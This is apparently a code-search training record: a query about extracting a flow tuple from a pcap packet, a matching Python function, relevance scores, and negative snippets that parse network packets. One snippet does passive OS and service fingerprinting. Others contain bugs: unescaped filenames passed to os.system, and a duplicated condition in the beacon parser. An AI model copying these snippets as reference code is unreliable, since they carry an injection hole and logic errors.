sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. #%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field" ]
[ "0.68164754", "0.62622094", "0.5889911", "0.5856772", "0.5697665", "0.52689415", "0.5258935", "0.52217716", "0.5157317", "0.51023954", "0.5042225", "0.5041668", "0.49423012", "0.49230462", "0.4902196", "0.4897916", "0.4865398", "0.48552364", "0.4845798", "0.48386303", "0.48383638", "0.48315713", "0.48302725", "0.48204654", "0.47920337", "0.4756438", "0.47318614", "0.47158575", "0.46967518", "0.4692864", "0.46895728", "0.4677398", "0.46671924", "0.46510032", "0.46491775", "0.46467093", "0.46380758", "0.46345225", "0.46184447", "0.4616935", "0.46125647", "0.4611935", "0.4606365", "0.45981917", "0.4596738", "0.4589551", "0.4587792", "0.4586166", "0.4573079", "0.45440322", "0.45413452", "0.45313165", "0.45258373", "0.45258015", "0.45041004", "0.4496944", "0.4490407", "0.4465584", "0.44652525", "0.44641605", "0.4458836", "0.44547534", "0.44400567", "0.44190434", "0.4405362", "0.44024128", "0.44023976", "0.43972683", "0.43957803", "0.43918607", "0.43900105", "0.43846765", "0.4373963", "0.43721968", "0.43708763", "0.43706474", "0.43701598", "0.436392", "0.43555003", "0.43553132", "0.4345016", "0.43335086", "0.43263817", "0.43141395", "0.4309909", "0.43098027", "0.4300021", "0.42906183", "0.42891818", "0.42877775", "0.4281078", "0.42622164", "0.42520672", "0.42438868", "0.42313784", "0.4230321", "0.42248863", "0.42243904", "0.42223495", "0.42163742" ]
0.63520455
1
Parse a packet from a pcap just enough to gain a flow description tuple
def flowtuple_from_raw(raw, linktype=1): ip = iplayer_from_raw(raw, linktype) if isinstance(ip, dpkt.ip.IP): sip, dip = socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst) proto = ip.p sport, dport = 0, 0 l3 = ip.data # try to get the layer 3 source and destination port, but its ok if this fails, # which will happen when we get IP fragments or packets with invalid checksums try: sport, dport = l3.sport, l3.dport except AttributeError: pass else: sip, dip, proto = 0, 0, -1 sport, dport = 0, 0 flowtuple = (sip, dip, sport, dport, proto) return flowtuple
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = 